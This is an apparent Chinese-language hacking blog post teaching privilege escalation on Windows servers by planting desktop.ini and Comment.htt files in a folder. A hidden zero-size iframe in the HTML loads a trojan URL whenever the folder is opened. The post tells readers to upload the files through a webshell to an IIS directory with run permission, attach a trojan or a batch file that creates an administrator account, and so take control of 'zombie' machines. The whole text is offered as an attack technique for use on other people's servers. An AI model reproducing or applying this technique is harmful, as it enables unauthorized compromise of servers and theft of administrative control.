最簡單有效的提權方法的小技巧

大家都知道最長用的幾種權限提升方法
我們主要說一下利用autorun .inf或desktop.ini，
這種方法有很大的局限性，必須管理員打開目錄或文件夾，現在國內的有些管理員不知道猴年馬月才登陸伺服器一次，成功率不是太高!
我們來講一下，怎麼主動利用這個方法desktop.ini提升權限!

我在本機器上個大家演示:
我們首先創建個 guests的用戶 命令:runas /user:admin cmd.exe
現在就是guests權限，我們來看一下看到了麼
現在我們建立一個 有自定義文件
我現在是在本機操作，大家用webshell的時候可是把最後的兩個文件上傳到一個有運行權限的目錄裡面
<body color:infotext; margin-top:1; font:menu">
<iframe src="填入你的木馬地址" name="xyxiao" width="0" height="0" frameborder="0"></iframe>
</body>
我們隨便選個地址

會產生兩個文件一個文件夾 desktop.ini ，Folder Settings（目錄）Comment.htt
Comment.htt文件存的就是剛才修改的那些訊息
可以自己修改，就是網頁代碼
如果看不到這幾個文件的話，可以把隱藏受保護的操作系統文件前面的對號給取消
和顯示所有文件前的對號取消就能看到啦
現在繼續
為了方便大家看效果，我把大小改為100 ，OK我現在沒有上網，所以出現這個頁面
好了，我們吧這兩個頁面上傳到可以運行的文件佳裡面
先放到C:\WINNT\system32\inetsrv\Data 這個目錄裡面，大家可以自己找，只要能有運行的權限就行啦

OK好了，大家可以在本地設置好再上傳上去，

OK現在我們用guests的權限 打開這個目錄，哈哈，這樣不就同時打開這個網頁啦，
我們在網頁掛上木馬，或者掛個.bat，建立個管理員帳號
命令:start C:\WINNT\system32\inetsrv\Data
呵呵已經打開，我們關了再試一下  
看到了麼，用guests權限打開目錄，，
這樣做的網頁木馬就運行啦，，，，呵呵，，，控制肉雞啦
好了，其實很簡單，只要大家多多注意就能發現很多有用的小技巧，

 

 
 

文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: 權限
相關日誌: